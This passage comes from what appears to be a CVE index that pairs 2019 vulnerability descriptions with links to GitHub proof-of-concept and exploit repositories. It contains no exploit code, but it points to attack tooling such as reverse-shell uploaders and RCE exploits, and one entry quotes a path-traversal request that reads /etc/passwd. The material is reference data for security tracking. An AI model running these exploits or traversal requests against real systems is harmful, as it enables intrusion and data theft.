- [tinker-li/CVE-2019-11043](https://github.com/tinker-li/CVE-2019-11043)
- [jas502n/CVE-2019-11043](https://github.com/jas502n/CVE-2019-11043)
- [AleWong/PHP-FPM-Remote-Code-Execution-Vulnerability-CVE-2019-11043-](https://github.com/AleWong/PHP-FPM-Remote-Code-Execution-Vulnerability-CVE-2019-11043-)
- [ianxtianxt/CVE-2019-11043](https://github.com/ianxtianxt/CVE-2019-11043)
- [fairyming/CVE-2019-11043](https://github.com/fairyming/CVE-2019-11043)
- [akamajoris/CVE-2019-11043-Docker](https://github.com/akamajoris/CVE-2019-11043-Docker)
- [theMiddleBlue/CVE-2019-11043](https://github.com/theMiddleBlue/CVE-2019-11043)
- [shadow-horse/cve-2019-11043](https://github.com/shadow-horse/cve-2019-11043)
- [huowen/CVE-2019-11043](https://github.com/huowen/CVE-2019-11043)
- [ypereirareis/docker-CVE-2019-11043](https://github.com/ypereirareis/docker-CVE-2019-11043)
- [MRdoulestar/CVE-2019-11043](https://github.com/MRdoulestar/CVE-2019-11043)
- [0th3rs-Security-Team/CVE-2019-11043](https://github.com/0th3rs-Security-Team/CVE-2019-11043)
- [k8gege/CVE-2019-11043](https://github.com/k8gege/CVE-2019-11043)
- [moniik/CVE-2019-11043_env](https://github.com/moniik/CVE-2019-11043_env)
- [kriskhub/CVE-2019-11043](https://github.com/kriskhub/CVE-2019-11043)
- [alokaranasinghe/cve-2019-11043](https://github.com/alokaranasinghe/cve-2019-11043)
- [corifeo/CVE-2019-11043](https://github.com/corifeo/CVE-2019-11043)
- [lindemer/CVE-2019-11043](https://github.com/lindemer/CVE-2019-11043)
- [jptr218/php_hack](https://github.com/jptr218/php_hack)
- [jas9reet/CVE-2019-11043](https://github.com/jas9reet/CVE-2019-11043)

### CVE-2019-11061 (2019-08-29)

A broken access control vulnerability in HG100 firmware versions up to 4.00.06 allows an attacker in the same local area network to control IoT devices that connect with itself via http://[target]/smarthome/devicecontrol without any authentication. CVSS 3.0 base score 10 (Confidentiality, Integrity and Availability impacts). CVSS vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).

- [tim124058/ASUS-SmartHome-Exploit](https://github.com/tim124058/ASUS-SmartHome-Exploit)

### CVE-2019-11076 (2019-04-23)

Cribl UI 1.5.0 allows remote attackers to run arbitrary commands via an unauthenticated web request.

- [livehybrid/poc-cribl-rce](https://github.com/livehybrid/poc-cribl-rce)

### CVE-2019-11157 (2019-12-16)

Improper conditions check in voltage settings for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege and/or information disclosure via local access.

- [zkenjar/v0ltpwn](https://github.com/zkenjar/v0ltpwn)

### CVE-2019-11223 (2019-04-18)

An Unrestricted File Upload Vulnerability in the SupportCandy plugin through 2.0.0 for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension.

- [AngelCtulhu/CVE-2019-11223](https://github.com/AngelCtulhu/CVE-2019-11223)

### CVE-2019-11224 (2019-05-15)

HARMAN AMX MVP5150 v2.87.13 devices allow remote OS Command Injection.

- [Insecurities/CVE-2019-11224](https://github.com/Insecurities/CVE-2019-11224)

### CVE-2019-11358 (2019-04-19)

jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype.

- [DanielRuf/snyk-js-jquery-174006](https://github.com/DanielRuf/snyk-js-jquery-174006)
- [bitnesswise/jquery-prototype-pollution-fix](https://github.com/bitnesswise/jquery-prototype-pollution-fix)
- [DanielRuf/snyk-js-jquery-565129](https://github.com/DanielRuf/snyk-js-jquery-565129)
- [chrisneagu/FTC-Skystone-Dark-Angels-Romania-2020](https://github.com/chrisneagu/FTC-Skystone-Dark-Angels-Romania-2020)
- [Snorlyd/https-nj.gov---CVE-2019-11358](https://github.com/Snorlyd/https-nj.gov---CVE-2019-11358)
- [isacaya/CVE-2019-11358](https://github.com/isacaya/CVE-2019-11358)

### CVE-2019-11395 (2019-04-21)

A buffer overflow in MailCarrier 2.51 allows remote attackers to execute arbitrary code via a long string, as demonstrated by SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP, or POP3 RETR.

- [RedAlien00/CVE-2019-11395](https://github.com/RedAlien00/CVE-2019-11395)
- [caioprince/CVE-2019-11395](https://github.com/caioprince/CVE-2019-11395)

### CVE-2019-11408 (2019-06-17)

XSS in app/operator_panel/index_inc.php in the Operator Panel module in FusionPBX 4.4.3 allows remote unauthenticated attackers to inject arbitrary JavaScript characters by placing a phone call using a specially crafted caller ID number. This can further lead to remote code execution by chaining this vulnerability with a command injection vulnerability also present in FusionPBX.

- [HoseynHeydari/fusionpbx_rce_vulnerability](https://github.com/HoseynHeydari/fusionpbx_rce_vulnerability)

### CVE-2019-11447 (2019-04-22)

An issue was discovered in CutePHP CuteNews 2.1.2. An attacker can infiltrate the server through the avatar upload process in the profile area via the avatar_file field to index.php?mod=main&opt=personal. There is no effective control of $imgsize in /core/modules/dashboard.php. The header content of a file can be changed and the control can be bypassed for code execution. (An attacker can use the GIF header for this.)

- [mt-code/CVE-2019-11447](https://github.com/mt-code/CVE-2019-11447)
- [khuntor/CVE-2019-11447-EXP](https://github.com/khuntor/CVE-2019-11447-EXP)
- [dinesh876/CVE-2019-11447-POC](https://github.com/dinesh876/CVE-2019-11447-POC)
- [ColdFusionX/CVE-2019-11447_CuteNews-AvatarUploadRCE](https://github.com/ColdFusionX/CVE-2019-11447_CuteNews-AvatarUploadRCE)
- [thewhiteh4t/cve-2019-11447](https://github.com/thewhiteh4t/cve-2019-11447)
- [0xConstant/CVE-2019-11447](https://github.com/0xConstant/CVE-2019-11447)
- [substing/CVE-2019-11447_reverse_shell_upload](https://github.com/substing/CVE-2019-11447_reverse_shell_upload)
- [CRFSlick/CVE-2019-11447-POC](https://github.com/CRFSlick/CVE-2019-11447-POC)
- [ojo5/CVE-2019-11447.c](https://github.com/ojo5/CVE-2019-11447.c)

### CVE-2019-11477 (2019-06-18)

Jonathan Looney discovered that the TCP_SKB_CB(skb)->tcp_gso_segs value was subject to an integer overflow in the Linux kernel when handling TCP Selective Acknowledgments (SACKs). A remote attacker could use this to cause a denial of service. This has been fixed in stable kernel releases 4.4.182, 4.9.182, 4.14.127, 4.19.52, 5.1.11, and is fixed in commit 3b4929f65b0d8249f19a50245cd88ed1a2f78cff.

- [sasqwatch/cve-2019-11477-poc](https://github.com/sasqwatch/cve-2019-11477-poc)

### CVE-2019-11510 (2019-05-08)

In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to exploit an arbitrary file reading vulnerability.

- [projectzeroindia/CVE-2019-11510](https://github.com/projectzeroindia/CVE-2019-11510)
- [nuc13us/Pulse](https://github.com/nuc13us/Pulse)
- [imjdl/CVE-2019-11510-poc](https://github.com/imjdl/CVE-2019-11510-poc)
- [es0/CVE-2019-11510_poc](https://github.com/es0/CVE-2019-11510_poc)
- [r00tpgp/http-pulse_ssl_vpn.nse](https://github.com/r00tpgp/http-pulse_ssl_vpn.nse)
- [jas502n/CVE-2019-11510-1](https://github.com/jas502n/CVE-2019-11510-1)
- [jason3e7/CVE-2019-11510](https://github.com/jason3e7/CVE-2019-11510)
- [BishopFox/pwn-pulse](https://github.com/BishopFox/pwn-pulse)
- [aqhmal/pulsexploit](https://github.com/aqhmal/pulsexploit)
- [cisagov/check-your-pulse](https://github.com/cisagov/check-your-pulse)
- [andripwn/pulse-exploit](https://github.com/andripwn/pulse-exploit)
- [pwn3z/CVE-2019-11510-PulseVPN](https://github.com/pwn3z/CVE-2019-11510-PulseVPN)
- [34zY/APT-Backpack](https://github.com/34zY/APT-Backpack)

### CVE-2019-11523 (2019-06-06)

Anviz Global M3 Outdoor RFID Access Control executes any command received from any source. No authentication/encryption is done. Attackers can fully interact with the device: for example, send the "open door" command, download the users list (which includes RFID codes and passcodes in cleartext), or update/create users. The same attack can be executed on a local network and over the internet (if the device is exposed on a public IP address).

- [wizlab-it/anviz-m3-rfid-cve-2019-11523-poc](https://github.com/wizlab-it/anviz-m3-rfid-cve-2019-11523-poc)

### CVE-2019-11539 (2019-04-26)

In Pulse Secure Pulse Connect Secure version 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, 8.2RX before 8.2R12.1, and 8.1RX before 8.1R15.1 and Pulse Policy Secure version 9.0RX before 9.0R3.2, 5.4RX before 5.4R7.1, 5.3RX before 5.3R12.1, 5.2RX before 5.2R12.1, and 5.1RX before 5.1R15.1, the admin web interface allows an authenticated attacker to inject and execute commands.

- [0xDezzy/CVE-2019-11539](https://github.com/0xDezzy/CVE-2019-11539)

### CVE-2019-11580 (2019-06-03)

Atlassian Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.

- [jas502n/CVE-2019-11580](https://github.com/jas502n/CVE-2019-11580)
- [shelld3v/CVE-2019-11580](https://github.com/shelld3v/CVE-2019-11580)

### CVE-2019-11581 (2019-08-09)

There was a server-side template injection vulnerability in Jira Server and Data Center, in the ContactAdministrators and the SendBulkMail actions. An attacker is able to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center. All versions of Jira Server and Data Center from 4.4.0 before 7.6.14, from 7.7.0 before 7.13.5, from 8.0.0 before 8.0.3, from 8.1.0 before 8.1.2, and from 8.2.0 before 8.2.3 are affected by this vulnerability.

- [jas502n/CVE-2019-11581](https://github.com/jas502n/CVE-2019-11581)
- [kobs0N/CVE-2019-11581](https://github.com/kobs0N/CVE-2019-11581)
- [PetrusViet/CVE-2019-11581](https://github.com/PetrusViet/CVE-2019-11581)

### CVE-2019-11687 (2019-05-02)

An issue was discovered in the DICOM Part 10 File Format in the NEMA DICOM Standard 1995 through 2019b. The preamble of a DICOM file that complies with this specification can contain the header for an executable file, such as Portable Executable (PE) malware. This space is left unspecified so that dual-purpose files can be created. (For example, dual-purpose TIFF/DICOM files are used in digital whole slide imaging for applications in medicine.) To exploit this vulnerability, someone must execute a maliciously crafted file that is encoded in the DICOM Part 10 File Format. PE/DICOM files are executable even with the .dcm file extension. Anti-malware configurations at healthcare facilities often ignore medical imagery. Also, anti-malware tools and business processes could violate regulatory frameworks (such as HIPAA) when processing suspicious DICOM files.

- [kosmokato/bad-dicom](https://github.com/kosmokato/bad-dicom)

### CVE-2019-11707 (2019-07-23)

A type confusion vulnerability can occur when manipulating JavaScript objects due to issues in Array.pop. This can allow for an exploitable crash. We are aware of targeted attacks in the wild abusing this flaw. This vulnerability affects Firefox ESR < 60.7.1, Firefox < 67.0.3, and Thunderbird < 60.7.2.

- [vigneshsrao/CVE-2019-11707](https://github.com/vigneshsrao/CVE-2019-11707)
- [flabbergastedbd/cve-2019-11707](https://github.com/flabbergastedbd/cve-2019-11707)

### CVE-2019-11708 (2019-07-23)

Insufficient vetting of parameters passed with the Prompt:Open IPC message between child and parent processes can result in the non-sandboxed parent process opening web content chosen by a compromised child process. When combined with additional vulnerabilities this could result in executing arbitrary code on the user's computer. This vulnerability affects Firefox ESR < 60.7.2, Firefox < 67.0.4, and Thunderbird < 60.7.2.

- [0vercl0k/CVE-2019-11708](https://github.com/0vercl0k/CVE-2019-11708)

### CVE-2019-11730 (2019-07-23)

A vulnerability exists where, if a user opens a locally saved HTML file, this file can use file: URIs to access other files in the same directory or sub-directories if the names are known or guessed. The Fetch API can then be used to read the contents of any files stored in these directories, and they may be uploaded to a server. It was demonstrated that in combination with a popular Android messaging app, if a malicious HTML attachment is sent to a user and they open that attachment in Firefox, due to that app's predictable pattern for locally-saved file names, it is possible to read attachments the victim received from other correspondents. This vulnerability affects Firefox ESR < 60.8, Firefox < 68, and Thunderbird < 60.8.

- [alidnf/CVE-2019-11730](https://github.com/alidnf/CVE-2019-11730)

### CVE-2019-11881 (2019-06-10)

A vulnerability exists in Rancher 2.1.4 in the login component, where the errorMsg parameter can be tampered to display arbitrary content, filtering tags but not special characters or symbols. There's no other limitation of the message, allowing malicious users to lure legitimate users to visit phishing sites with scare tactics, e.g., displaying a "This version of Rancher is outdated, please visit https://malicious.rancher.site/upgrading" message.

- [MauroEldritch/VanCleef](https://github.com/MauroEldritch/VanCleef)

### CVE-2019-11931 (2019-11-14)

A stack-based buffer overflow could be triggered in WhatsApp by sending a specially crafted MP4 file to a WhatsApp user. The issue was present in parsing the elementary stream metadata of an MP4 file and could result in a DoS or RCE. This affects Android versions prior to 2.19.274, iOS versions prior to 2.19.100, Enterprise Client versions prior to 2.25.3, Business for Android versions prior to 2.19.104 and Business for iOS versions prior to 2.19.100.

- [kasif-dekel/whatsapp-rce-patched](https://github.com/kasif-dekel/whatsapp-rce-patched)
- [nop-team/CVE-2019-11931](https://github.com/nop-team/CVE-2019-11931)

### CVE-2019-11932 (2019-10-03)

A double free vulnerability in the DDGifSlurp function in decoding.c in the android-gif-drawable library before version 1.2.18, as used in WhatsApp for Android before version 2.19.244 and many other Android applications, allows remote attackers to execute arbitrary code or cause a denial of service when the library is used to parse a specially crafted GIF image.

- [dorkerdevil/CVE-2019-11932](https://github.com/dorkerdevil/CVE-2019-11932)
- [awakened1712/CVE-2019-11932](https://github.com/awakened1712/CVE-2019-11932)
- [JasonJerry/WhatsRCE](https://github.com/JasonJerry/WhatsRCE)
- [TulungagungCyberLink/CVE-2019-11932](https://github.com/TulungagungCyberLink/CVE-2019-11932)
- [infiniteLoopers/CVE-2019-11932](https://github.com/infiniteLoopers/CVE-2019-11932)
- [valbrux/CVE-2019-11932-SupportApp](https://github.com/valbrux/CVE-2019-11932-SupportApp)
- [fastmo/CVE-2019-11932](https://github.com/fastmo/CVE-2019-11932)
- [mRanonyMousTZ/CVE-2019-11932-whatsApp-exploit](https://github.com/mRanonyMousTZ/CVE-2019-11932-whatsApp-exploit)
- [SmoZy92/CVE-2019-11932](https://github.com/SmoZy92/CVE-2019-11932)
- [dashtic172/https-github.com-awakened171](https://github.com/dashtic172/https-github.com-awakened171)
- [Err0r-ICA/WhatsPayloadRCE](https://github.com/Err0r-ICA/WhatsPayloadRCE)
- [starling021/CVE-2019-11932-SupportApp](https://github.com/starling021/CVE-2019-11932-SupportApp)
- [primebeast/CVE-2019-11932](https://github.com/primebeast/CVE-2019-11932)
- [BadAssAiras/hello](https://github.com/BadAssAiras/hello)
- [kal1gh0st/WhatsAppHACK-RCE](https://github.com/kal1gh0st/WhatsAppHACK-RCE)
- [zxn1/CVE-2019-11932](https://github.com/zxn1/CVE-2019-11932)
- [k3vinlusec/WhatsApp-Double-Free-Vulnerability_CVE-2019-11932](https://github.com/k3vinlusec/WhatsApp-Double-Free-Vulnerability_CVE-2019-11932)
- [Tabni/https-github.com-awakened1712-CVE-2019-11932](https://github.com/Tabni/https-github.com-awakened1712-CVE-2019-11932)
- [0759104103/cd-CVE-2019-11932](https://github.com/0759104103/cd-CVE-2019-11932)
- [tucommenceapousser/CVE-2019-11932](https://github.com/tucommenceapousser/CVE-2019-11932)
- [tucommenceapousser/CVE-2019-11932deta](https://github.com/tucommenceapousser/CVE-2019-11932deta)

### CVE-2019-11933 (2019-10-23)

A heap buffer overflow bug in libpl_droidsonroids_gif before 1.2.19, as used in WhatsApp for Android before version 2.19.291 could allow remote attackers to execute arbitrary code or cause a denial of service.

- [NatleoJ/CVE-2019-11933](https://github.com/NatleoJ/CVE-2019-11933)
- [KISH84172/CVE-2019-11933](https://github.com/KISH84172/CVE-2019-11933)

### CVE-2019-12086 (2019-05-17)

A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation.

- [motoyasu-saburi/CVE-2019-12086-jackson-databind-file-read](https://github.com/motoyasu-saburi/CVE-2019-12086-jackson-databind-file-read)
- [Al1ex/CVE-2019-12086](https://github.com/Al1ex/CVE-2019-12086)

### CVE-2019-12169 (2019-06-03)

ATutor 2.2.4 allows Arbitrary File Upload and Directory Traversal, resulting in remote code execution via a ".." pathname in a ZIP archive to the mods/_core/languages/language_import.php (aka Import New Language) or mods/_standard/patcher/index_admin.php (aka Patcher) component.

- [fuzzlove/ATutor-2.2.4-Language-Exploit](https://github.com/fuzzlove/ATutor-2.2.4-Language-Exploit)

### CVE-2019-12170 (2019-05-17)

ATutor through 2.2.4 is vulnerable to arbitrary file uploads via the mods/_core/backups/upload.php (aka backup) component. This may result in remote command execution. An attacker can use the instructor account to fully compromise the system using a crafted backup ZIP archive. This will allow for PHP files to be written to the web root, and for code to execute on the remote server.

- [fuzzlove/ATutor-Instructor-Backup-Arbitrary-File](https://github.com/fuzzlove/ATutor-Instructor-Backup-Arbitrary-File)

### CVE-2019-12180 (2020-02-05)

An issue was discovered in SmartBear ReadyAPI through 2.8.2 and 3.0.0 and SoapUI through 5.5. When opening a project, the Groovy "Load Script" is automatically executed. This allows an attacker to execute arbitrary Groovy Language code (Java scripting language) on the victim machine by inducing it to open a malicious Project. The same issue is present in the "Save Script" function, which is executed automatically when saving a project.

- [0x-nope/CVE-2019-12180](https://github.com/0x-nope/CVE-2019-12180)

### CVE-2019-12181 (2019-06-17)

A privilege escalation vulnerability exists in SolarWinds Serv-U before 15.1.7 for Linux.

- [mavlevin/CVE-2019-12181](https://github.com/mavlevin/CVE-2019-12181)

### CVE-2019-12185 (2019-05-19)

eLabFTW 1.8.5 is vulnerable to arbitrary file uploads via the /app/controllers/EntityController.php component. This may result in remote command execution. An attacker can use a user account to fully compromise the system using a POST request. This will allow for PHP files to be written to the web root, and for code to execute on the remote server.

- [fuzzlove/eLabFTW-1.8.5-EntityController-Arbitrary-File-Upload-RCE](https://github.com/fuzzlove/eLabFTW-1.8.5-EntityController-Arbitrary-File-Upload-RCE)

### CVE-2019-12189 (2019-05-21)

An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do search field.

- [falconz/CVE-2019-12189](https://github.com/falconz/CVE-2019-12189)

### CVE-2019-12255 (2019-08-09)

Wind River VxWorks has a Buffer Overflow in the TCP component (issue 1 of 4). This is an IPNET security vulnerability: TCP Urgent Pointer = 0 leads to an integer underflow.

- [sud0woodo/Urgent11-Suricata-LUA-scripts](https://github.com/sud0woodo/Urgent11-Suricata-LUA-scripts)

### CVE-2019-12272 (2019-05-23)

In OpenWrt LuCI through 0.10, the endpoints admin/status/realtime/bandwidth_status and admin/status/realtime/wireless_status of the web application are affected by a command injection vulnerability.

- [HACHp1/LuCI_RCE_exp](https://github.com/HACHp1/LuCI_RCE_exp)
- [nevercodecorrect/lede-17.01.3](https://github.com/nevercodecorrect/lede-17.01.3)

### CVE-2019-12314 (2019-05-24)

Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.

- [ras313/CVE-2019-12314](https://github.com/ras313/CVE-2019-12314)

### CVE-2019-12384 (2019-06-24)

FasterXML jackson-databind 2.x before 2.9.9.1 might allow attackers to have a variety of impacts by leveraging failure to block the logback-core class from polymorphic deserialization. Depending on the classpath content, remote code execution may be possible.

- [jas502n/CVE-2019-12384](https://github.com/jas502n/CVE-2019-12384)
- [MagicZer0/Jackson_RCE-CVE-2019-12384](https://github.com/MagicZer0/Jackson_RCE-CVE-2019-12384)

### CVE-2019-12409 (2019-11-18)

The 8.1.1 and 8.2.0 releases of Apache Solr contain an insecure setting for the ENABLE_REMOTE_JMX_OPTS configuration option in the default solr.in.sh configuration file shipping with Solr. If you use the default solr.in.sh file from the affected releases, then JMX monitoring will be enabled and exposed on RMI_PORT (default=18983), without any authentication. If this port is opened for inbound traffic in your firewall, then anyone with network access to your Solr nodes will be able to access JMX, which may in turn allow them to upload malicious code for execution on the Solr server.

- [jas502n/CVE-2019-12409](https://github.com/jas502n/CVE-2019-12409)

### CVE-2019-12453 (2019-07-19)

In MicroStrategy Web before 10.1 patch 10, stored XSS is possible in the FLTB parameter due to missing input validation.

- [undefinedmode/CVE-2019-12453](https://github.com/undefinedmode/CVE-2019-12453)

### CVE-2019-12460 (2019-05-30)

Web Port 1.19.1 allows XSS via the /access/setup type parameter.

- [EmreOvunc/WebPort-v1.19.1-Reflected-XSS](https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS)

### CVE-2019-12475 (2019-07-17)

In MicroStrategy Web before 10.4.6, there is stored XSS in metric due to insufficient input validation.

- [undefinedmode/CVE-2019-12475](https://github.com/undefinedmode/CVE-2019-12475)

### CVE-2019-12476 (2019-06-17)

An authentication bypass vulnerability in the password reset functionality in Zoho ManageEngine ADSelfService Plus before 5.0.6 allows an attacker with physical access to gain a shell with SYSTEM privileges via the restricted thick client browser. The attack uses a long sequence of crafted keyboard input.

- [0katz/CVE-2019-12476](https://github.com/0katz/CVE-2019-12476)

### CVE-2019-12489 (2019-11-26)

An issue was discovered on Fastweb Askey RTV1907VW 0.00.81_FW_200_Askey 2018-10-02 18:08:18 devices. By using the usb_remove service through an HTTP request, it is possible to inject and execute a command between two & characters in the mount parameter.

- [garis/Fastgate](https://github.com/garis/Fastgate)

### CVE-2019-12538 (2019-06-05)

An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SiteLookup.do search field.

- [tarantula-team/CVE-2019-12538](https://github.com/tarantula-team/CVE-2019-12538)

### CVE-2019-12541 (2019-06-05)

An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SolutionSearch.do searchText parameter.

- [tarantula-team/CVE-2019-12541](https://github.com/tarantula-team/CVE-2019-12541)

### CVE-2019-12542 (2019-06-05)

An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do userConfigID parameter.

- [tarantula-team/CVE-2019-12542](https://github.com/tarantula-team/CVE-2019-12542)

### CVE-2019-12543 (2019-06-05)

An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the PurchaseRequest.do serviceRequestId parameter.

- [tarantula-team/CVE-2019-12543](https://github.com/tarantula-team/CVE-2019-12543)

### CVE-2019-12562 (2019-09-26)

Stored Cross-Site Scripting in DotNetNuke (DNN) versions before 9.4.0 allows remote attackers to store and embed a malicious script in the admin notification page. The exploit could be used to perform any action with admin privileges, such as managing content, adding users, uploading backdoors to the server, etc. Successful exploitation occurs when an admin user visits a notification page containing the stored cross-site scripting.

- [MAYASEVEN/CVE-2019-12562](https://github.com/MAYASEVEN/CVE-2019-12562)

### CVE-2019-12586 (2019-09-04)

The EAP peer implementation in Espressif ESP-IDF 2.0.0 through 4.0.0 and ESP8266_NONOS_SDK 2.2.0 through 3.1.0 processes EAP Success messages before any EAP method completion or failure, which allows attackers in radio range to cause a denial of service (crash) via a crafted message.

- [Matheus-Garbelini/esp32_esp8266_attacks](https://github.com/Matheus-Garbelini/esp32_esp8266_attacks)

### CVE-2019-12594 (2019-07-02)

DOSBox 0.74-2 has Incorrect Access Control.

- [Alexandre-Bartel/CVE-2019-12594](https://github.com/Alexandre-Bartel/CVE-2019-12594)

### CVE-2019-12616 (2019-06-05)

An issue was discovered in phpMyAdmin before 4.9.0. A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) to the victim.

- [Cappricio-Securities/CVE-2019-12616](https://github.com/Cappricio-Securities/CVE-2019-12616)

### CVE-2019-12725 (2019-07-19)

Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.

- [givemefivw/CVE-2019-12725](https://github.com/givemefivw/CVE-2019-12725)
- [sma11new/PocList](https://github.com/sma11new/PocList)
- [hev0x/CVE-2019-12725-Command-Injection](https://github.com/hev0x/CVE-2019-12725-Command-Injection)
- [gougou123-hash/CVE-2019-12725](https://github.com/gougou123-hash/CVE-2019-12725)

### CVE-2019-12735 (2019-06-05)

getchar.c in Vim before 8.1.1365 and Neovim before 0.3.6 allows remote attackers to execute arbitrary OS commands via the :source! command in a modeline, as demonstrated by execute in Vim, and assert_fails or nvim_input in Neovim.

- [pcy190/ace-vim-neovim](https://github.com/pcy190/ace-vim-neovim)
- [oldthree3/CVE-2019-12735-VIM-NEOVIM](https://github.com/oldthree3/CVE-2019-12735-VIM-NEOVIM)
- [datntsec/CVE-2019-12735](https://github.com/datntsec/CVE-2019-12735)
- [nickylimjj/cve-2019-12735](https://github.com/nickylimjj/cve-2019-12735)
- [st9007a/CVE-2019-12735](https://github.com/st9007a/CVE-2019-12735)

### CVE-2019-12744 (2019-06-20)

SeedDMS before 5.1.11 allows Remote Command Execution (RCE) because of unvalidated file upload of PHP scripts, a different vulnerability than CVE-2018-12940.

- [nobodyatall648/CVE-2019-12744](https://github.com/nobodyatall648/CVE-2019-12744)

### CVE-2019-12750 (2019-07-31)

Symantec Endpoint Protection, prior to 14.2 RU1 & 12.1 RU6 MP10 and Symantec Endpoint Protection Small Business Edition, prior to 12.1 RU6 MP10c (12.1.7491.7002), may be susceptible to a privilege escalation vulnerability, which is a type of issue whereby an attacker may attempt to compromise the software application to gain elevated access to resources that are normally protected from an application or user.

- [v-p-b/cve-2019-12750](https://github.com/v-p-b/cve-2019-12750)

### CVE-2019-12796

- [PeterUpfold/CVE-2019-12796](https://github.com/PeterUpfold/CVE-2019-12796)

### CVE-2019-12814 (2019-06-19)

A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.

- [Al1ex/CVE-2019-12814](https://github.com/Al1ex/CVE-2019-12814)

### CVE-2019-12815 (2019-07-19)

An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows for remote code execution and information disclosure without authentication, a related issue to CVE-2015-3306.

- [KTN1990/CVE-2019-12815](https://github.com/KTN1990/CVE-2019-12815)
- [lcartey/proftpd-cve-2019-12815](https://github.com/lcartey/proftpd-cve-2019-12815)

### CVE-2019-12836 (2019-06-21)

The Bobronix JEditor editor before 3.0.6 for Jira allows an attacker to add a URL/Link (to an existing issue) that can cause forgery of a request to an out-of-origin domain. This in turn may allow for a forged request that can be invoked in the context of an authenticated user, leading to stealing of session tokens and account takeover.

- [9lyph/CVE-2019-12836](https://github.com/9lyph/CVE-2019-12836)

### CVE-2019-12840 (2019-06-15)

In Webmin through 1.910, any user authorized to the "Package Updates" module can execute arbitrary commands with root privileges via the data parameter to update.cgi.

- [bkaraceylan/CVE-2019-12840_POC](https://github.com/bkaraceylan/CVE-2019-12840_POC)
- [KrE80r/webmin_cve-2019-12840_poc](https://github.com/KrE80r/webmin_cve-2019-12840_poc)
- [anasbousselham/webminscan](https://github.com/anasbousselham/webminscan)
- [zAbuQasem/CVE-2019-12840](https://github.com/zAbuQasem/CVE-2019-12840)
- [WizzzStark/CVE-2019-12840.py](https://github.com/WizzzStark/CVE-2019-12840.py)
- [Pol-Ruiz/PoC-CVE-2019-12840](https://github.com/Pol-Ruiz/PoC-CVE-2019-12840)

### CVE-2019-12889 (2019-08-20)

An unauthenticated privilege escalation exists in SailPoint Desktop Password Reset 7.2. A user with local access to only the Windows logon screen can escalate their privileges to NT AUTHORITY\System. An attacker would need local access to the machine for a successful exploit. The attacker must disconnect the computer from the local network / WAN and connect it to an internet facing access point / network. At that point, the attacker can execute the password-reset functionality, which will expose a web browser. Browsing to a site that calls local Windows system functions (e.g., file upload) will expose the local file system. From there an attacker can launch a privileged command shell.

- [nulsect0r/CVE-2019-12889](https://github.com/nulsect0r/CVE-2019-12889)

### CVE-2019-12890 (2019-06-19)

RedwoodHQ 2.5.5 does not require any authentication for database operations, which allows remote attackers to create admin users via a con.automationframework users insert_one call.

- [EthicalHCOP/CVE-2019-12890_RedxploitHQ](https://github.com/EthicalHCOP/CVE-2019-12890_RedxploitHQ)

### CVE-2019-12937 (2019-06-23)

apps/gsudo.c in gsudo in ToaruOS through 1.10.9 has a buffer overflow allowing local privilege escalation to the root user via the DISPLAY environment variable.

- [AkashicYiTai/CVE-2019-12937-ToaruOS](https://github.com/AkashicYiTai/CVE-2019-12937-ToaruOS)

### CVE-2019-12949 (2019-06-25)

In pfSense 2.4.4-p2 and 2.4.4-p3, if it is possible to trick an authenticated administrator into clicking on a button on a phishing page, an attacker can leverage XSS to upload arbitrary executable code, via diag_command.php and rrd_fetch_json.php (timePeriod parameter), to a server. Then, the remote attacker can run any command with root privileges on that server.

- [tarantula-team/CVE-2019-12949](https://github.com/tarantula-team/CVE-2019-12949)

### CVE-2019-12999 (2020-01-31)

